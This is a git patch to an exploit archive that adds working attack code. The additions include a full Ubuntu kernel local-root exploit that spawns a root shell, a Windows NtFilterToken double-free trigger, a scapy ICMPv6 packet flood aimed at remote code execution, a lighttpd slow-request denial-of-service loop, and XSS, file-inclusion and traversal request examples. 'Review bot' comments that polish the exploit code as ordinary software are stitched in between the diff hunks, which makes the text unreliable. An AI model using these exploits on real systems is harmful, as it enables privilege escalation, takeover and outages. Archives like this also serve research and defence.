From 46fb11d33b725fc40597c81ce09507091be2eb50 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 2 Jun 2014 04:37:23 +0000
Subject: [PATCH] Updated 06_02_2014
---
files.csv | 15 +++-
platforms/linux/dos/33591.sh | 15 ++++
platforms/linux/dos/33592.txt | 12 +++
platforms/linux/local/33589.c | 133 ++++++++++++++++++++++++++++
platforms/php/webapps/33555.txt | 86 ++++++++++++++++++
platforms/php/webapps/33590.txt | 9 ++
platforms/windows/local/33593.c | 135 +++++++++++++++++++++++++++++
platforms/windows/remote/33594.txt | 17 ++++
8 files changed, 418 insertions(+), 4 deletions(-)
create mode 100755 platforms/linux/dos/33591.sh
create mode 100755 platforms/linux/dos/33592.txt
create mode 100755 platforms/linux/local/33589.c
create mode 100755 platforms/php/webapps/33555.txt
create mode 100755 platforms/php/webapps/33590.txt
create mode 100755 platforms/windows/local/33593.c
create mode 100755 platforms/windows/remote/33594.txt
diff --git a/files.csv b/files.csv
index b52b011bc..169888951 100755
--- a/files.csv
+++ b/files.csv
@@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
-15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21
+15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
@@ -17181,7 +17181,7 @@ id,file,description,date,author,platform,type,port
 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,metasploit,windows,remote,888
 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
 19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0
-19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel h0wl Wylecial",php,webapps,0
+19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 - CMS Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0
@@ -23212,7 +23212,7 @@ id,file,description,date,author,platform,type,port
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@@ -30227,6 +30227,7 @@ id,file,description,date,author,platform,type,port
 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
 33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
+33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (msf)",2014-05-28,j0sm1,multiple,dos,5247
 33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80
 33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 'failurl' Parameter HTTP Response Splitting Vulnerability",2010-01-21,Trancer,php,webapps,0
@@ -30257,5 +30258,11 @@ id,file,description,date,author,platform,type,port
 33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
-33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0
+33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
+33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0
+33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0
+33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0
+33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
+33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
+33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0
diff --git a/platforms/linux/dos/33591.sh b/platforms/linux/dos/33591.sh
new file mode 100755
index 000000000..bc9247140
--- /dev/null
+++ b/platforms/linux/dos/33591.sh
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/38036/info
+
+The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
+
+Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.
+
+##slow_test.sh
+for ((j=0;j<1000;j++)) do
+ for ((i=0; i<50; i++)) do
+ ## slow_client is a C program which sends a HTTP request very slowly
+ ./slow_client http://www.example.com/>/dev/null 2>/dev/null &
+ done&
+ sleep 3
+done
+
diff --git a/platforms/linux/dos/33592.txt b/platforms/linux/dos/33592.txt
new file mode 100755
index 000000000..b2274f5e5
--- /dev/null
+++ b/platforms/linux/dos/33592.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38038/info
+
+
+The Linux kernel is prone to a local denial-of-service vulnerability that affects the Kernel-based Virtual Machine (KVM).
+
+Attackers with local access to a guest operating system can exploit this issue to crash the host operating system.
+
+Successful exploits will deny service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+The following example command is available:
+
+cat /dev/port
\ No newline at end of file
diff --git a/platforms/linux/local/33589.c b/platforms/linux/local/33589.c
new file mode 100755
index 000000000..0d972437a
--- /dev/null
+++ b/platforms/linux/local/33589.c
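Review bot: The first six lines of platforms/linux/dos/33591.sh (`source: http://www.securityfocus.com/bid/38036/info`, the two description sentences and the blank lines between them) are advisory prose with no `#` in front of them, yet the file is committed with a `.sh` suffix and mode 100755, so as stored it is not a well-formed shell script and anything that trusts the extension will misparse it. Prefixing those lines with `# `, or keeping the advisory text in a sibling `.txt` the way the other entries in this commit do, would make the archive entry consistent with its name. The same defect is present in platforms/windows/local/33593.c later in this patch, where the `source:` line and two description paragraphs precede the `//` header block uncommented. The script header also mentions a `slow_client` C program only in a comment and nothing in the commit documents where it comes from, which is worth stating explicitly for readers of the archive.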
@@ -0,0 +1,133 @@ +/** + * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit + * by Vitaly Nikolenko (vnik5287@gmail.com) + * + * based on semtex.c by sd + * + * Supported targets: + * [0] Ubuntu 12.04.0 - 3.2.0-23-generic + * [1] Ubuntu 12.04.1 - 3.2.0-29-generic + * [2] Ubuntu 12.04.2 - 3.5.0-23-generic + * + * $ gcc vnik.c -O2 -o vnik + * + * $ uname -r + * 3.2.0-23-generic + * + * $ ./vnik 0 + */ + +#define _GNU_SOURCE 1 +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define BASE 0x1780000000 +#define SIZE 0x0010000000 +#define KSIZE 0x2000000 +#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) + +typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); + +uint64_t targets[3][3] = + {{0xffffffff81ef67e0, // perf_swevent_enabled + 0xffffffff81091630, // commit_creds + 0xffffffff810918e0}, // prepare_kernel_cred + {0xffffffff81ef67a0, + 0xffffffff81091220, + 0xffffffff810914d0}, + {0xffffffff81ef5940, + 0xffffffff8107ee30, + 0xffffffff8107f0c0} + }; + +void __attribute__((regparm(3))) payload() { + uint32_t *fixptr = (void*)AB(1); + // restore the handler + *fixptr = -1; + commit_creds_fn commit_creds = (commit_creds_fn)AB(2); + prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); + commit_creds(prepare_kernel_cred((uint64_t)NULL)); +} + +void trigger(uint32_t off) { + uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; + int fd = syscall(298, buf, 0, -1, -1, 0); + assert( !close(fd) ); +} + +int main(int argc, char **argv) { + uint64_t off64, needle, kbase, *p; + uint8_t *code; + uint32_t int_n, j = 5, target = 1337; + int offset = 0; + void *map; + + assert(argc == 2 && "target?"); + assert( (target = atoi(argv[1])) < 3 ); + + struct { + uint16_t limit; + uint64_t addr; + } __attribute__((packed)) idt; + + // mmap user-space block so we 
don't page fault + // on sw_perf_event_destroy + assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); + memset(map, 0, SIZE); + + asm volatile("sidt %0" : "=m" (idt)); + kbase = idt.addr & 0xff000000; + printf("IDT addr = 0x%lx\n", idt.addr); + + assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); + memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); + memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); + + // can only play with interrupts 3, 4 and 0x80 + for (int_n = 3; int_n <= 0x80; int_n++) { + for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { + int off32 = off64; + + if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { + offset = off32; + goto out; + } + } + if (int_n == 4) { + // shit, let's try 0x80 if the kernel is compiled with + // CONFIG_IA32_EMULATION + int_n = 0x80 - 1; + } + } +out: + assert(offset); + printf("Using int = %d with offset = %d\n", int_n, offset); + + for (j = 0; j < 3; j++) { + needle = AB(j+1); + assert(p = memmem(code, 1024, &needle, 8)); + *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; + } + trigger(offset); + switch (int_n) { + case 3: + asm volatile("int $0x03"); + break; + case 4: + asm volatile("int $0x04"); + break; + case 0x80: + asm volatile("int $0x80"); + } + + assert(!setuid(0)); + return execl("/bin/bash", "-sh", NULL); +} diff --git a/platforms/php/webapps/33555.txt b/platforms/php/webapps/33555.txt new file mode 100755 index 000000000..6e26f06c2 --- /dev/null +++ b/platforms/php/webapps/33555.txt 
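Review bot: The build line in the header comment, `$ gcc vnik.c -O2 -o vnik`, refers to a file name that does not exist in this commit; the file is archived as platforms/linux/local/33589.c, so the documented command should name the archived file or note the archive's renaming. As rendered in this hunk the nine `#include` lines carry no header name at all, which looks like an extraction artifact that dropped the angle-bracketed operands, but it is worth confirming against the raw file because the hunk as shown would not compile. The literal `298` in `trigger()` and the `3`, `7` and `0x32` arguments to the two `mmap()` calls in `main()` are undocumented magic numbers; a comment next to them such as `// 298 == __NR_perf_event_open on x86_64; 0x32 == MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS` would make the x86_64-only assumption explicit, which the hard-coded `targets` table already implies but nothing states.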
@@ -0,0 +1,86 @@ +# Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities +# Date: 05/28/2014 +# Author: Mustafa ALTINKAYNAK +# Download URL :http://auracms.org/ +# Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master +# Vuln Category: CWE-79 (XSS) - CWE-98 (LFI) +# Tested on: AuraCMS 3.0 +# Tested Local Platform : XAMP on Windows 8 +# Patch/ Fix: Not published. +--------------------------- + +Technical Details +--------------------------- +1) Reflected XSS : FileManager is a parameter unfiltered view of the file. +Ex: filemanager.php?viewdir="> + +2) LFI (Local File Include) : Directory listing is done. +Ex : filemanager.php?viewdir=/home + +--------------------------------------------------------------------------------- +# filemanager.php (Between 263,311 line) +Example : domain.com/auracms/filemanager.php?viewdir=request +280 line : + +Example 2 : domain.com/auracms/filemanager.php?viewdir="> +" name="return" /> + +Example 3 : domain.com/auracms/filemanager.php?viewdir= +" name="return" /> Bingooo :) + + +
    +
  • +
  • +
  • +
  • +
+ +
+ +
+ + + +----------- + +Mustafa ALTINKAYNAK +twitter : @m_altinkaynak +www.mustafaaltinkaynak.com diff --git a/platforms/php/webapps/33590.txt b/platforms/php/webapps/33590.txt new file mode 100755 index 000000000..580804856 --- /dev/null +++ b/platforms/php/webapps/33590.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38034/info + +The AutartiTarot component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +NOTE: Successful exploitation requires having 'Public Back-end' group credentials. + +http://www.example.com/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT] \ No newline at end of file diff --git a/platforms/windows/local/33593.c b/platforms/windows/local/33593.c new file mode 100755 index 000000000..7325e09f0 --- /dev/null +++ b/platforms/windows/local/33593.c 
@@ -0,0 +1,135 @@ +source: http://www.securityfocus.com/bid/38044/info + +Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel. + +An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service. + +// -------------------------------------------------------- +// Windows NtFilterToken() Double Free Vulnerability +// ----------------------------- taviso@sdf.lonestar.org ------------ +// +// INTRODUCTION +// +// NtFilterToken() will jump to a cleanup routine if it failed to capture +// the arguments specified due to pathological TOKEN_GROUP parameter. This +// cleanup routine assumes a pointer passed to SeCaptureSidAndAttributesArray() +// will be NULL if it fails, and attempts to release it otherwise. +// +// Unfortunately there is a codepath where SeCaptureSidAndAttributesArray() +// allocates a buffer, releases it on error, but then does not set it to +// NULL. This causes NtFilterToken() to incorrectly free it again. +// +// IMPACT +// +// This is probably exploitable (at least on MP kernels) to get ring0 code +// execution, but you would have to get the released buffer re-allocated +// during a very small window and you only get one attempt (the kernel +// will bugcheck if you dont win the race). +// +// Although technically this is a local privilege escalation, I don't think +// it's possible to create a reliable exploit. Therefore, It's probably +// safe to treat this as if it were a denial of service. +// +// Interestingly, Microsoft are big proponents of static analysis and this +// seems like a model example of a statically discoverable bug. I would +// guess they're dissapointed they missed this one, it would be fun to +// know what went wrong. +// +// This vulnerability was reported to Microsoft in October, 2009. 
+// +// CREDIT +// +// This bug was discovered by Tavis Ormandy . +// + +#include + +PVOID AllocBufferOnPageBoundary(ULONG Size); + +int main(int argc, char **argv) +{ + SID *Sid; + HANDLE NewToken; + FARPROC NtFilterToken; + PTOKEN_GROUPS Restricted; + + // Resolve the required routine. + NtFilterToken = GetProcAddress(GetModuleHandle("NTDLL"), "NtFilterToken"); + + // Allocate SID such that touching the following byte will AV. + Sid = AllocBufferOnPageBoundary(sizeof(SID)); + Restricted = AllocBufferOnPageBoundary(sizeof(PTOKEN_GROUPS) + sizeof(SID_AND_ATTRIBUTES)); + + // Setup SID, SubAuthorityCount is the important field. + Sid->Revision = SID_REVISION; + Sid->SubAuthority[0] = SECURITY_NULL_RID; + Sid->SubAuthorityCount = 2; + + // Respect my authority. + CopyMemory(Sid->IdentifierAuthority.Value, "taviso", sizeof Sid->IdentifierAuthority.Value); + + // Setup the TOKEN_GROUPS structure. + Restricted->Groups[0].Attributes = SE_GROUP_MANDATORY; + Restricted->Groups[0].Sid = Sid; + Restricted->GroupCount = 1; + + // Trigger the vulnerabilty. + NtFilterToken(INVALID_HANDLE_VALUE, + 0, + NULL, + NULL, + Restricted, + &NewToken); + + // Not reached + return 0; +} + +#ifndef PAGE_SIZE +# define PAGE_SIZE 0x1000 +#endif + +// This is a quick routine to allocate a buffer on a page boundary. Simply +// VirtualAlloc() two consecutive pages read/write, then use VirtualProtect() +// to set the second page to PAGE_NOACCESS. 
+// +// sizeof(buffer) +// | +// <-+-> +// +----------------+----------------+ +// | PAGE_READWRITE | PAGE_NOACCESS | +// +----------------+----------------+ +// ^ ^ +// | | +// buffer[0] -+ +- buffer[size] +// +// No error checking for simplicity, whatever :-) +// +PVOID AllocBufferOnPageBoundary(ULONG Size) +{ + ULONG GuardBufSize; + ULONG ProtBits; + PBYTE GuardBuf; + + // Round size requested up to the next multiple of PAGE_SIZE + GuardBufSize = (Size + (PAGE_SIZE - 1)) & ~(PAGE_SIZE - 1); + + // Add one page to be the guard page + GuardBufSize = GuardBufSize + PAGE_SIZE; + + // Map this anonymous memory + GuardBuf = VirtualAlloc(NULL, + GuardBufSize, + MEM_COMMIT | MEM_RESERVE, + PAGE_READWRITE); + + // Make the final page NOACCESS + VirtualProtect(GuardBuf + GuardBufSize - PAGE_SIZE, + PAGE_SIZE, + PAGE_NOACCESS, + &ProtBits); + + // Calculate where pointer should be, so that touching Buffer[Size] AVs. + return GuardBuf + GuardBufSize - PAGE_SIZE - Size; +} + diff --git a/platforms/windows/remote/33594.txt b/platforms/windows/remote/33594.txt new file mode 100755 index 000000000..89697a793 --- /dev/null +++ b/platforms/windows/remote/33594.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/38061/info + +Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability. + +An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. + + +v6_dst = "" + +mac_dst = "" + +pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008) + +l=fragment6(pkt, 1500) + +for p in l: +sendp(Ether(dst=mac_dst)/p, iface="eth0") \ No newline at end of file
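Review bot: In `main()`, `sizeof(PTOKEN_GROUPS)` in the `Restricted` allocation is the size of a pointer, not of the `TOKEN_GROUPS` header, so the requested size reads as a typo; it appears to work only because on both 32- and 64-bit builds a pointer happens to be as wide as the padded offset of `Groups`, which is presumably coincidence rather than design. `sizeof(TOKEN_GROUPS)` (which as declared in winnt.h already carries one `SID_AND_ATTRIBUTES` element through `ANYSIZE_ARRAY`) states the intent and keeps the `buffer[size]` guard-page arithmetic documented above `AllocBufferOnPageBoundary` meaningful. `NtFilterToken` is held in an untyped `FARPROC` and invoked with six arguments, so the compiler performs no argument checking on that call; a function-pointer typedef with the expected signature would document the contract. The `GetProcAddress`, `VirtualAlloc` and `VirtualProtect` results are left unchecked, which the author acknowledges in the comment block, but the `main()` comment `// Not reached` would be wrong on any failure path, so a short note that a NULL from any of them crashes in user mode rather than reaching the kernel would help a reader triaging a crash.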